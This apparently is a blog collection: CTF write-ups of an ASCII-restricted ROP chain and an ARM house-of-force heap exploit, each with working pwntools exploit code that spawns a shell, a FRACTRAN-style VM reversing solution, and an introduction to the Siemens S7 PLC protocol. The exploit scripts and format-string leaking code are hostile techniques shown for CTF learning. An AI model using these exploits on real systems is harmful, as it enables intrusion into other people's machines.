This was a fairly straightforward challenge. We were given a binary with a textbook buffer overflow, no canaries and NX enabled. The only twist was the input filtering, which only allowed ASCII characters: each byte had to be between 0x20 and 0x7f, otherwise the program terminated. This meant that the challenge boiled down to crafting a ROP chain that contains only “good” characters.

Luckily for us, the program mmaped the provided libc.so to the ASCII-friendly address 0x5555e000. This mapping was going to serve as our only source of ROP gadgets, as the program binary itself was loaded at a bad address. I began by getting a list of the available libc functions that reside at good addresses. The nm --dynamic libc.so command can be used to list the exported symbols, and I quickly put together a little Python script to filter the results.

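#!/usr/bin/python2
import sys

LIBC_BASE = 0x5555e000  # address where the challenge mmaps libc.so

with open('functions.list') as f:
    for line in f:
        # every useful line of the nm output starts with the symbol offset in hex
        try:
            address = int(line.split()[0], 16) + LIBC_BASE
        except (ValueError, IndexError):
            continue
        test = address
        try:
            # all four bytes of the address have to pass the input filter
            for i in range(4):
                lbyte = test & 0xff
                if lbyte <= 0x1f or lbyte > 0x7e:
                    raise ValueError('bad byte in address')
                test = test >> 8
        except ValueError:
            continue
        sys.stdout.write(hex(address) + '/' + line)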

Unfortunately neither the system function nor the /bin/sh string was at a good address, so I had to look for something else. It struck me that the gets function was available, which could be used to overwrite my buffer with unfiltered data. This approach was a dead end, and I will briefly explain why. gets requires a single parameter, a pointer to the buffer to read into, which is passed on the stack since this challenge was built for i386. Ideally I wanted to overwrite the stack buffer, so I had to push ESP onto the stack, which seemed fairly easy to do. I quickly put together the ROP chain and then realised that none of the libc variables were initialized. This is obviously not the real libc, just an mmaped binary blob, which means that the libc init was never called and all the variables, such as the stdin pointer and the env pointer, are left as null. This of course breaks most of the libc function calls.

So I had to come up with a different approach relying only on system calls, or on wrappers that do not use any of the aforementioned variables. My plan B became jumping to a call execve instruction with the correct parameters set up (I could not just jump to execve since it was at a bad address). The problem was that execve requires a pointer to the /bin/sh string, which is at a bad address, and two null pointers (for env and arg), which again cannot be supplied directly. So I had to set up these parameters in registers, push them onto the stack in the right order and then call execve.

I used ROPgadget --all to gather the gadgets and filtered the output the same way as I filtered the symbol list. I spent some time looking through the gadgets to figure out where and how I could set up the parameters, and then I found the pusha gadget. pusha pushes all the general purpose registers onto the stack in the following order: EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI. This was perfect for me. All that was left to do:

  • set EAX to 0 as it is going to be the env pointer
  • set ECX to 0 as the arg pointer
  • calculate the address of /bin/sh in EDX
  • put the address of call execve in EBX
  • set the address of the next gadget in EDI, which is executed right after the pusha; this gadget should pop 3 items off the stack (the pushed ESI, EBP and former ESP) so that the ret lands on the call execve address (the pushed EBX)
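
To double check the register plan above, the stack layout after pusha can be modelled in a few lines. This is only a sketch: the three addresses are the ones from my exploit, while the ESP value and the ESI/EBP fillers are placeholders I made up for the illustration.

```python
# Order in which pusha/pushal pushes the 32-bit registers (EAX first, EDI last).
PUSHA_ORDER = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def stack_after_pusha(regs):
    """Return (name, value) pairs as seen from the top of the stack downwards."""
    # The register pushed last (EDI) ends up on top of the stack.
    return [(name, regs[name]) for name in reversed(PUSHA_ORDER)]

regs = {
    "eax": 0,            # becomes the env pointer argument
    "ecx": 0,            # becomes the arg pointer argument
    "edx": 0x556bb7ec,   # address of /bin/sh
    "ebx": 0x55616967,   # address of the call execve instruction
    "esp": 0xffffd000,   # placeholder, the real value is not known
    "ebp": 0x43434343,   # filler (assumption)
    "esi": 0x43434343,   # filler (assumption)
    "edi": 0x5560365c,   # gadget that pops three dwords before its ret
}

stack = stack_after_pusha(regs)
ret_target = stack[0]    # consumed by the ret that follows pusha
skipped = stack[1:4]     # popped by the three pops of the EDI gadget
next_ret = stack[4]      # consumed by the ret of the EDI gadget
args = stack[5:8]        # left on the stack as the execve parameters
```

Reading the result from the top of the stack: EDI is returned to first, ESI, EBP and the saved ESP are skipped, EBX is returned to next, and EDX, ECX, EAX are left as the three parameters.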

There were pop edi and pop ebx gadgets, so setting those up was trivial, as was setting EAX to null with a xor eax, eax gadget. ECX was set to null with an xchg eax, ecx gadget, and EDX was calculated with the add eax, 0xc35b0000 and sub edx, eax gadgets, after setting EAX and EDX appropriately beforehand (/bin/sh: 0x556bb7ec = 0x3a212121-(0xc35b0000+0x215a6935), truncated to 32 bits). The actual exploit code is really messy and I am too lazy to clean it up, so I am just going to copy it here as is. I hope this explanation makes up for it. The ROP chain worked like a charm after I spent a considerable amount of time piecing it together. The flag was:

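flag{Asc11_ea3y_d0_1t???}

from pwn import *  # pwntools: remote, p32, hexdump

if __name__ == "__main__":
    # IP and PORT are the address of the challenge server (not given here)
    c = remote(IP, PORT)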

    binsh = 0x556bb7ec

# 0x556d2a51/0x00174a51 : pop ecx ; add al, 0xa ; ret
    popecx = 0x556d2a51
# hex((0x3a212121-(0xc35b0000+0x215a6935))&0xffffffff)
    edxval = 0x3a212121
    ecxval = 0x215a6935
# 0x555f3555/0x00095555 : pop edx ; xor eax, eax ; pop edi ; ret
    popedx = 0x555f3555 # 0 eax popedi
    filler = 'CCCC'
# 0x556a6253/0x00148253 : mov eax, ecx ; ret
    moveaxecx = 0x556a6253
# 0x5557734b/0x0001934b : add eax, 0xc35b0000 ; ret
    addieax = 0x5557734b
# 0x5560365c/0x000a565c : sub edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
    subedxeax = 0x5560365c #pop esi,edi, ebp trash eax
    
    # Set up bin sh addr in edx
    payload = 'A'*32 +p32(popecx) + p32(ecxval)\
        + p32(popedx) + p32(edxval) + filler \
        + p32(moveaxecx)+p32(addieax) + p32(subedxeax) +filler*3
  

# 0x55617a5f/0x000b9a5f : xchg eax, ecx ; mov eax, 0xff ; jne 0xb9a41 ; ret
    xchgeaxecx = 0x55617a5f
# 0x555f6428/0x00098428 : xor eax, eax ; ret
    xoreax = 0x555f6428
    # Set null in ecx and eax
    payload += p32(xoreax) + p32(xchgeaxecx) + p32(xoreax)


# 0x555f2166/0x00094166 : pop ebx ; pop edi ; ret
    popebxedi = 0x555f2166
    callexecve = 0x55616967
    
    # Set up ebx and edi
    # the subedxeax gadget pops esi, edi, ebp so 
    #it is used to position the stack after the pusha
    payload += p32(popebxedi) + p32(callexecve) + p32(subedxeax)

# pushal; ret; -> returns edi
    pushal = 0x5563704c
    # pushall
    payload += p32(pushal)
 
    #print hexdump(payload)
    payload += 'B'*(2398-len(payload))
    #sys.stdout.write(payload)
    #sys.stdout.flush()
    c.sendline(payload)

    c.interactive()
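
The address arithmetic behind edxval and ecxval can be verified separately from the exploit. The snippet below is a small sketch of that check; the is_filter_safe helper is a name I introduce here, and it uses the same 0x20..0x7e byte range as my filter script.

```python
MASK = 0xffffffff  # registers are 32 bits wide on i386

def is_filter_safe(value):
    """True if all four bytes of a 32-bit value are in the 0x20..0x7e range."""
    return all(0x20 <= (value >> shift) & 0xff <= 0x7e
               for shift in (0, 8, 16, 24))

edxval = 0x3a212121      # popped into EDX
ecxval = 0x215a6935      # popped into ECX, then moved to EAX
add_const = 0xc35b0000   # constant of the add eax, 0xc35b0000 gadget

eax = (ecxval + add_const) & MASK   # state after the add gadget
edx = (edxval - eax) & MASK         # state after the sub edx, eax gadget
```

Both popped constants pass the filter, while the resulting /bin/sh address does not, which is why it has to be computed at run time.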

I solved this challenge with the help of my teammate @KT. The required technique and the vulnerabilities in this challenge are very similar to those in the bcloud (pwn 150) exercise. I solved this one first, so I will describe them here. I might add a writeup for the other challenge too, if I have the time.

$ ./checksec.sh --file ruin
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   ruin

We were given an ARM (EABI-5) binary, which we immediately loaded up in IDA. The code is pretty simple, so the reversing was straightforward, and the Hex-Rays decompiler makes it even easier. The program reads a key, and if it is correct we are presented with a menu where we can write strings into three different buffers.

The vulnerabilities in the binary were pretty obvious. The first one is in the key-reading routine at the very beginning: it reads 8 characters into an 8-byte array in .bss, then prints it if it is not the right key.

printf("please input your 8-bit key:");
fread(g8bitKeySecurity, 1u, 8u, (FILE *)stdin);
if ( !strncmp(g8bitKeySecurity, "security", 8u) )
   break;
printf("%s is wrong, try again!\n", g8bitKeySecurity);

Luckily there is a heap pointer right after the buffer in .bss, so if we provide an invalid key that is 8 characters long, the buffer is not null-terminated and printf keeps printing into the pointer. This gives us our heap leak, which will be crucial later.

The second vuln is in the edit secret function, which allocates an 8-byte buffer and then reads up to 24 bytes into it (fgets stores at most 23 characters plus the terminating null).

if ( !gSecretBOF )
  gSecretBOF = (char *)malloc(8u);
printf("please input your secret:");
return fgets(gSecretBOF, 24, (FILE *)stdin);

The third vuln is in the sign name function, which only checks the upper bound of the supplied integer, and the integer is later converted to unsigned. A negative value passes the check, which allows us to allocate an arbitrarily large buffer.

So what we have at this point is a heap leak, a binary with no RELRO and no PIE, a heap buffer that overflows, an arbitrary user-controlled heap allocation and a third buffer that we can write to. This screams house of force (note: a good resource for heap exploits is How2Heap by shellphish, which also explains and demonstrates house of force in detail).

During house of force we overwrite the size of the wilderness (the size of the last free chunk) to be extremely large, so we can allocate huge buffers on the chunked (brk) heap and avoid calling mmap. This way we can move the “end of the heap” to an arbitrary location in memory and control the next allocation. Since there is no full RELRO and no PIE, we can overwrite .got.plt to gain IP control. To position the “heap end” at the GOT we have to allocate a buffer of target_address - 2*pointer_size - heap_current_top bytes.

## Leak the heapbase
connect = c
c.recvuntil(":")
c.send("xxxxxxxx")
leak = c.recvuntil(':')
print hexdump(leak[8:12])
heapbase = u32(leak[8:12]) - 8
c.send("security")
c.recvuntil(":")

## Overwrite last chunk free space
LAST_CHUNK_SIZE= "\xff"*4 + "\xff"*4
FILL="\x00"*8
sendData(c, 2, ["A"*8+LAST_CHUNK_SIZE+FILL])
print "Wilderness Set Up"
c.send('\n')
c.recvuntil(':')

## Position the "heap end"
heap_top = heapbase + 20
target = e.got['exit']
print hex(target)
address = target - 8 - heap_top
print str(address)
OFFSET_TO_GOT= str(address) + 'A'* (32 -len(str(address)))
sendData(c, 3, [OFFSET_TO_GOT,"A"*10+"\n"])
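
The size computation in the last step can be isolated into a tiny helper. This is a sketch with assumed values: 0x10f7c is the address of the exit entry in the .got of this binary, but the heap base of 0x21000 is a made-up example, since the real one comes from the leak.

```python
MASK32 = 0xffffffff  # the target is a 32-bit ARM binary

def house_of_force_request(target, heap_top, pointer_size=4):
    """Allocation size that moves the heap top to just below target."""
    return target - 2 * pointer_size - heap_top

exit_got = 0x10f7c        # exit entry of the .got
heap_base = 0x21000       # hypothetical leaked heap base
heap_top = heap_base + 20

request = house_of_force_request(exit_got, heap_top)
as_unsigned = request & MASK32   # what the allocator sees after the conversion
```

Because the .got sits below the heap, the request is negative. It passes the upper bound check of the sign name function and only turns into a huge size once it is converted to unsigned.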

Our third controlled buffer is 16 bytes long, and together with the 8 bytes of the chunk header we would overwrite 24 bytes in the .got.

.got:00010F74 __libc_start_main_ptr DCD __imp___libc_start_main
.got:00010F74                                         ; DATA XREF: __libc_start_main+8r
.got:00010F78 __gmon_start___ptr DCD __imp___gmon_start__ ; DATA XREF: __gmon_start__+8r
.got:00010F7C exit_ptr        DCD __imp_exit          ; DATA XREF: exit+8r
.got:00010F80 atoi_ptr        DCD __imp_atoi          ; DATA XREF: atoi+8r
.got:00010F84 strncmp_ptr     DCD __imp_strncmp       ; DATA XREF: strncmp+8r
.got:00010F88 abort_ptr       DCD __imp_abort         ; DATA XREF: abort+8r

A good target to overwrite is atoi, because we can directly supply a string as its parameter and it has enough space before and after it. Now that we have IP control we need an address to jump to, however we don't yet have the libc base address or the libc version. At this point we decided to overwrite atoi with the .plt address of the printf stub to leak further information.

## leak libc base
c.send("%21$p|%22$p/\n")
libc = c.recvuntil('/')[:-1]
start = int(libc.split('|')[0], 16)
segment = int(libc.split('|')[1], 16)
print hex(start)
print hex(segment)

## Overwrite got
PAYLOAD_ADDR=p32(0x8594)
sendData(c, 1, [PAYLOAD_ADDR+ "\x00"* (16-len(PAYLOAD_ADDR))])

Fortunately there are libc addresses on the stack that we can read, so we only need the address of system. With our printf we have an arbitrary read over the entire memory, thus we can search libc for the system export symbol. This can be further simplified with the pwntools DynELF lookup. The only problem is that the printf input is read by fgets and then handled as a C string, which ends at the first null byte, so we can't directly read addresses containing a 0x00 byte. This is not a huge problem, because we can still read from the previous or next address and identify the ELF header.

def leaker(addr):
    sys.stdout.write(hex(addr) + ': ')
    if addr%0x100 == 0:
        print "upppss..."
        if not '000' in '%02x'%(addr + 1):
            testVal = leaker(addr + 1)
            if testVal[0:3] == "ELF":
                return "\x7f" + testVal
            else:
                return leaker(addr - 1)
        else:
            return leaker(addr - 1)
    else:
        connect.send(p32(addr) + "%5$s\n")
        data = connect.recvuntil('\nwrong')[4:-6]
        if data == "":
            data += "\x00"
        print '%r' % data
        dump = connect.recvuntil(':')
        return data

d = DynELF(leaker, start)
system = d.lookup('system')
print 'system = %r' % system

At this point we have everything we need, we just have to rewrite the atoi entry with the leaked system address. One little catch is that we have overwritten atoi, whose return value is used to navigate the menu. Luckily we can use the printf to navigate by sending as many characters as the number of the menu option we want to hit (printf returns the number of printed bytes). Finally we just have to send the “/bin/sh” input to system and we have our remote shell to read the flag.

BCTF{H0w_3lf_Ru1n3d_XmaS}

The complete exploit is available here (disclaimer: it was written under CTF circumstances and it might disturb seasoned coders). I think the challenge was all right, however it really did not make any difference that it was ARM (besides making it a tiny bit harder to figure out the libc version). I was hoping for some ARM/Thumb mode switching ROP chain writing or something specific to the architecture, which was not needed to solve the challenge. Still, I had fun, and thanks to the organizers for the challenge.

In this reversing exercise we are given an unstripped 64-bit ELF file. Reversing the binary is fairly simple: just load it in IDA or Hopper and you pretty much have the source code. Before I started working on the task my teammate @sghctoma had already rewritten the program in C and extracted the “constants” array. The source code of the program:

#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <gmp.h>

#include "defs.h"

void factor_print(mpz_t a1)
{
    mpz_t v5;
    char c;

    mpz_init_set(v5, a1);

    for (int i = 0; i <= 171; ++i) {
        c = 0;
        while (mpz_divisible_ui_p(v5, primes[i])) {
            mpz_tdiv_q_ui(v5, v5, primes[i]);
            ++c;
        }
        if (!c) break;
        putchar(c);
    }
    putchar('\n');
}

int main(int argc, char* argv[])
{
    mpz_t v10, v11, v14, v15;
    size_t size = 172;

    mpz_init(v10);
    mpz_init(v11);
    mpz_init(v14);
    mpz_init(v15);

    mpz_set_ui(v15, 1019);

    char* line = (char*)malloc(size);
    size_t s = getline(&line, &size, stdin);
    line[s - 1] = 0;

    // v15 = 1019 * primes[0]^line[0] * primes[1]^line[1] .. primes[limit]^line[limit]
    double limit = fmin((double)s, 84.0);
    for (int i = 0; (double)i < limit; ++i) {
        mpz_set_ui(v14, primes[i]);
        mpz_pow_ui(v14, v14, line[i]);
        mpz_mul(v15, v15, v14);
    }
    // if v15 = fractions[338], or v15 == fractions[339] at this point
    // we get the congratz message.
    int cont;
    int i = 0;
    do {
        cont = 0;
        for (int j = 0; j < 423; ++j) {
            gmp_sscanf(fractions[2 * j], "%Zi", v11);
            gmp_sscanf(fractions[2 * j + 1], "%Zi", v10);
            mpz_set(v14, v15);
            mpz_mul(v14, v14, v11);
            if (mpz_divisible_p(v14, v10)) {
                mpz_tdiv_q(v15, v14, v10);
                cont = 1;
                break;
            }
        }
        i++;
    } while(cont);

    factor_print(v15);
}

The defs.h file contains the definition of the primes array, which holds the first 172 prime numbers. The fractions array contains a set of integers that can be factorized with the given prime numbers.

If we go through the code we can see that we have to enter a number by providing the exponents of its prime factors, however we can only use the first 83 prime numbers. Then the program multiplies this number by 1019 (which is the 171st prime), runs it through a series of transformations and prints the result. If the result of the transformation is fractions[339] then we get the Congratulations message.

The transformation is the following: it iterates over every second number in the fractions array, multiplies the input by it and stores the result in a temporary variable. If the result can be divided by the next number in the fractions[] array then the quotient is stored as the next input and the cycle starts over. If no division happens the cycle ends and the result is printed.

At this point it is clear that we are looking at a VM that stores its state in an integer through its prime factors. We can look at this state as a set of 172 unique bins, each of these bins holding zero or more tokens. The bins are identified by the corresponding prime factor and the tokens are represented by the exponent of that factor. The “instructions” try to push some tokens into given bins, then try to pop some other tokens. If the pop is successful the instruction is executed, otherwise nothing happens (the push is reverted). If no instruction can be executed the final state is printed.
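
This scheme is essentially Conway's FRACTRAN, so the main loop of the VM fits in a few lines. The sketch below is my own minimal model of the loop in the C code above, using (numerator, denominator) pairs instead of the flat fractions array; the one-instruction adder at the end is a toy program for illustration and is not part of the challenge.

```python
def run(fractions, state):
    """Apply the first fraction that keeps the state an integer, until none does."""
    while True:
        for num, den in fractions:
            # "push" multiplies by the numerator, "pop" divides by the denominator
            if (state * num) % den == 0:
                state = state * num // den
                break   # restart from the first instruction, like the C loop
        else:
            # no instruction could be executed: this is the final state
            return state

# Toy program: move every token from bin 0 (prime 2) into bin 1 (prime 3).
adder = [(3, 2)]
result = run(adder, 2**3 * 3**4)   # 3 tokens in bin 0, 4 tokens in bin 1
```

With the toy program the final state holds all seven tokens in bin 1, so it effectively adds the two exponents.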

Printing all the states in the fractions array shows that we want the inner state to be fractions[338] or fractions[339], because state 338 is directly transformed into 339 in the next cycle. Unfortunately neither of these can be factorized using only the first 83 primes, so we have to take a closer look at the actual instructions. I wrote a small Python snippet that factorizes all the number pairs in the fractions array and prints which bins and tokens are affected, in the following format:

index inst  count/address
.
.
.
346   pop:  75/0 1/170
      push:  1/171 1/84

352   pop:  69/1 1/170
      push:  1/171 1/85

358   pop:  89/2 1/170
      push:  1/86 1/171

364   pop:  123/3 1/170
      push:  1/87 1/171

370   pop:  40/4 1/170
      push:  1/88 1/171

376   pop:  66/5 1/170
      push:  1/89 1/171

382   pop:  1/170 121/6
      push:  1/90 1/171
.
.
.
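
The original snippet is not included here, but a listing like the one above could be produced roughly as follows. This is a sketch, not the code I used: factor_over and describe are names made up for this example, and the prime table and the fraction are passed in as plain Python integers.

```python
def factor_over(n, primes):
    """Return {bin_index: token_count} for n, using only the given primes."""
    if n <= 0:
        raise ValueError("only positive integers can be factorized")
    bins = {}
    for idx, p in enumerate(primes):
        while n % p == 0:
            n //= p
            bins[idx] = bins.get(idx, 0) + 1
    if n != 1:
        raise ValueError("number has a factor outside the prime table")
    return bins

def describe(index, num, den, primes):
    """Format one instruction: the denominator pops, the numerator pushes."""
    def fmt(bins):
        return " ".join("%d/%d" % (cnt, idx) for idx, cnt in sorted(bins.items()))
    pop = fmt(factor_over(den, primes))
    push = fmt(factor_over(num, primes))
    return "%-5d pop:  %s\n      push:  %s" % (index, pop, push)

# Toy example with a four-entry prime table instead of the 172 real ones.
toy_primes = [2, 3, 5, 7]
listing = describe(0, 3 * 7, 2**2 * 5, toy_primes)
```

For the toy fraction 21/20 this reports a pop of two tokens from bin 0 and one from bin 2, and a push of one token each into bins 1 and 3.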

By examining the instructions we can see that bins 167 and above are used for control tokens and that the first 165 instructions are pretty much only used to drive an arbitrary state into the “wrong solution” state. The really interesting part starts at the 170th instruction: from there on, every third instruction pops tokens from one of the first 83 bins and pushes a token into one of the bins 84-166. This is exactly what is required to reach the state fractions[338] and get the win message. I wrote the following little Python script to calculate the correct input:

def prime_factors(n):
    i = 2
    factors = []
    while i * i <= n:
        if n % i:
            i += 1
        else:
            n //= i
            factors.append(i)
    if n > 1:
        factors.append(n)
    return factors

def get_solution(num):
    fact = prime_factors(num)
    res = dict()
    for p in fact:
        i = primes.index(p)
        if str(i) in res:
            res[str(i)] += 1
        else:
            res[str(i)] = 1
    ret = ""
    for k in res:
        if k != "170":
           return res[str(k)]
    return ret
    
with open("solution.txt", "wb") as f:
    for i in range(346, len(frac)-2, 6):
        f.write(chr(get_solution(int(frac[i+1]))))
    f.write('\n')

The result was KEY{(By the way, this challenge would be much easier with a cybernetic frog brain)}; these are the correct initial token values for the first 83 bins. At this point we just had to calculate the MD5 sum of the string to get the real flag, BKPCTF{db7365f3ff8887aa315d79361651627f}.

I think this challenge wasn’t particularly hard to solve, however it was real fun. I really liked the idea of storing program state as prime factors. Thanks to the organizers for the challenge.

I have been working with Siemens PLCs for quite some time, mostly developing applications that either communicate with them or observe/simulate their communication. I thought it was time to share what I have learned about the S7 protocol, as some might find it useful or interesting. The purpose of this article is to aid those who wish to gain a deeper understanding of the Siemens S7 communication protocol and to help the development of software interfacing with these devices. This documentation of the protocol is not comprehensive; many parts are left to be uncovered. While writing this article I only had access to S-300 and S-400 series devices (S315-2A and S417 to be specific) and I had never worked with S-200/S-1200/S-1500 series PLCs, thus functions specific to those are not covered here.

As far as I know, there is no publicly available documentation for the S7 protocol, however there are a few notable projects that help to deal with it. Davide Nardella has created a fantastic open source communication library, Snap7, which implements basic communication scenarios. The library comes with extensive documentation of the basic structure of the S7 protocol. Another great project is the S7 Wireshark dissector by Thomas W., which covers most of the protocol and whose source code contains a lengthy list of protocol constants. These proved to be invaluable to me during the years I spent working with Siemens equipment. Since there is no official documentation, no official terminology exists when it comes to the S7 protocol. In the rest of this document I try to comply with the terms used in the above mentioned projects.

Edit: Since I wrote this article I learned about a new and actively developed open-source project, plc4x. The project provides implementation for multiple industrial protocols including the S7 protocol.

1. The Siemens Communication Scenario

Before going into more technical details I’d like to briefly introduce the basic Siemens communication theater. When I talk about the “S7 protocol” I refer to the Ethernet S7 communication that is mainly used to connect the PLCs to the (I)PC stations (PG/PC - PLC communication). This is not to be confused with the different fieldbus protocols that Siemens equipment uses, such as MPI, Profibus, IE and Profinet (which is an Ethernet based protocol used to connect PLCs to IO modules, not the management protocol of the devices).

Most of the time the Siemens communication follows the traditional master-slave or client-server model, where the PC (master/client) sends S7 requests to the field device (slave/server). These requests are used to query data from the device, send data to it or issue certain commands. There are a few exceptions where a PLC can be the communication master: with FB14/FB15 the device can initiate GET and PUT requests to other devices.

In the S400 series a so-called Cyclic Data I/O function is implemented, which resembles the traditional publisher-subscriber model. The PC can subscribe to certain events, then the PLC periodically pushes the requested data to the network. There is also a Partner or peer-to-peer model, where an Active Partner requests a connection and calls Block Send while at the same time the Passive Partner calls the Block Receive method.

For more information on the general overview of the S7 communication see the Siemens Simatic Net and Snap7 documentation.

2. The S7 PDU

The S7 protocol TCP/IP implementation relies on the block-oriented ISO transport service. The S7 protocol is wrapped in the TPKT and ISO-COTP protocols, which allow the PDU (Protocol Data Unit) to be carried over TCP. The ISO over TCP communication is defined in RFC1006, and ISO-COTP is defined in RFC2126, which is based on the ISO 8073 protocol (RFC905). This structure is presented in the figure below.

[Figure: S7ProtoStructure]
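
To illustrate the layering, the following sketch peels the TPKT and COTP headers off a frame to get to the S7 PDU. It is based on my reading of RFC1006 (TPKT version 3 and a 16-bit big-endian total length) and on the COTP data TPDU code 0xF0; the unwrap_tpkt_cotp name is made up for this example, and it assumes the buffer holds exactly one complete TPKT packet.

```python
import struct

TPKT_HEADER_LEN = 4
COTP_DATA = 0xF0  # PDU type code of a COTP data (DT) TPDU

def unwrap_tpkt_cotp(frame):
    """Return the payload carried by one TPKT packet holding a COTP data TPDU."""
    if len(frame) < TPKT_HEADER_LEN + 2:
        raise ValueError("frame too short")
    version, _reserved, length = struct.unpack(">BBH", frame[:TPKT_HEADER_LEN])
    if version != 3:
        raise ValueError("unexpected TPKT version")
    if length != len(frame):
        raise ValueError("TPKT length does not match the frame size")
    # The COTP length indicator counts the header bytes that follow it.
    cotp_len, pdu_type = struct.unpack("BB", frame[4:6])
    if pdu_type != COTP_DATA:
        raise ValueError("not a COTP data TPDU")
    return frame[TPKT_HEADER_LEN + 1 + cotp_len:length]

# A 9 byte example frame: TPKT header, 3 byte COTP header, 2 payload bytes.
example = b"\x03\x00\x00\x09" + b"\x02\xf0\x80" + b"\x32\x01"
payload = unwrap_tpkt_cotp(example)
```

Connection setup TPDUs use other type codes and are rejected by this sketch, so it only covers frames that actually carry S7 data.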

The S7 protocol is function/command oriented, which means a transmission consists of an S7 request and an appropriate reply (with very few exceptions). The number of parallel transmissions and the maximum length of a PDU are negotiated during the connection setup.

The S7 PDU consists of three main parts:

  • Header: contains length information, PDU reference and message type constant
  • Parameters: the content and structure greatly varies based on the message and function type of the PDU
  • Data: an optional field that carries the data if there is any, e.g. memory values, block code, firmware data, etc.

2.1 Header

The header is 10 or 12 bytes long: the acknowledgement messages contain two extra error code bytes. Other than that the header format is consistent across all the PDUs.

[Figure: S7HeaderStructure]

Fields:

  • Protocol ID:[1b] protocol constant always set to 0x32
  • Message Type:[1b] the general type of the message (sometimes referred to as ROSCTR type)
    • 0x01-Job Request: request sent by the master (e.g. read/write memory, read/write blocks, start/stop device, setup communication)
    • 0x02-Ack: simple acknowledgement sent by the slave with no data field (I have never seen it sent by the S300/S400 devices)
    • 0x03-Ack-Data: acknowledgement with optional data field, contains the reply to a job request
    • 0x07-Userdata: an extension of the original protocol, the parameter field contains the request/response id (used for programming/debugging, SZL reads, security functions, time setup, cyclic read, etc.)
  • Reserved:[2b] always set to 0x0000 (but probably ignored)
  • PDU reference:[2b] generated by the master, incremented with each new transmission, used to link responses to their requests, Little-Endian (note: this is the behaviour of WinCC, Step7, and other Siemens programs, it could probably be randomly generated, the PLC just copies it to the reply)
  • Parameter Length:[2b] the length of the parameter field, Big-Endian
  • Data Length:[2b] the length of the data field, Big-Endian
  • (Error class):[1b] only present in the Ack-Data messages, the possible error constants are listed in the constants.txt
  • (Error code):[1b] only present in the Ack-Data messages, the possible error constants are listed in the constants.txt
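
The field list above translates into a short parser. This is a sketch that follows the byte orders as listed (little-endian PDU reference, big-endian lengths); parse_s7_header is a name I made up, and treating both Ack (0x02) and Ack-Data (0x03) as carrying the two error bytes is an assumption on my part.

```python
import struct

S7_PROTOCOL_ID = 0x32
ACK_TYPES = (0x02, 0x03)  # assumption: both acknowledgement types carry error bytes

def parse_s7_header(pdu):
    """Parse the 10 or 12 byte S7 header at the start of pdu into a dict."""
    if len(pdu) < 10:
        raise ValueError("an S7 header needs at least 10 bytes")
    proto_id, msg_type, reserved = struct.unpack(">BBH", pdu[:4])
    if proto_id != S7_PROTOCOL_ID:
        raise ValueError("not an S7 PDU")
    (pdu_ref,) = struct.unpack("<H", pdu[4:6])             # little-endian
    param_len, data_len = struct.unpack(">HH", pdu[6:10])  # big-endian
    header = {
        "msg_type": msg_type,
        "reserved": reserved,
        "pdu_ref": pdu_ref,
        "param_len": param_len,
        "data_len": data_len,
        "header_len": 10,
    }
    if msg_type in ACK_TYPES:
        if len(pdu) < 12:
            raise ValueError("acknowledgement header needs 12 bytes")
        header["error_class"], header["error_code"] = struct.unpack("BB", pdu[10:12])
        header["header_len"] = 12
    return header

# Hand-made example headers, not taken from a real capture.
job = parse_s7_header(b"\x32\x01\x00\x00\x01\x00\x00\x08\x00\x00")
ack = parse_s7_header(b"\x32\x03\x00\x00\x01\x00\x00\x02\x00\x05\x81\x04")
```

The parameter field starts at offset header_len and is param_len bytes long, followed by data_len bytes of data.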

The rest of the message greatly depends on the Message Type and the function code. I will be covering each of those in the upcoming articles. Part 2 will focus on Job Requests and Ack-Data messages. Part 3 will cover the different Userdata functions and their structures.

All the different protocol constants are collected in the constants.txt.

I plan to keep these writings updated as much as possible, so if you have anything to add or correct feel free to contact me or leave a comment.

Update 2018-04-08:

  • Added reference to plc4x
  • Added link to the second part

Update 2017-03-14:

  • I have added a git repo with various thematic network captures of S7 communication
  • I am no longer working with Siemens equipment, however due to the interest in the topic I have started writing part 2 of this article. Since I have no access to real devices it is going to be based on the different traffic captures I have lying around and on my memories. Expect more gaps to fill.
  • I have limited experience dealing with userdata messages (other than SZL reads and cyclic updates they are mostly used for development, programming and debugging purposes) so I am not sure if I can cover them in a meaningful way based on the few pcaps I have
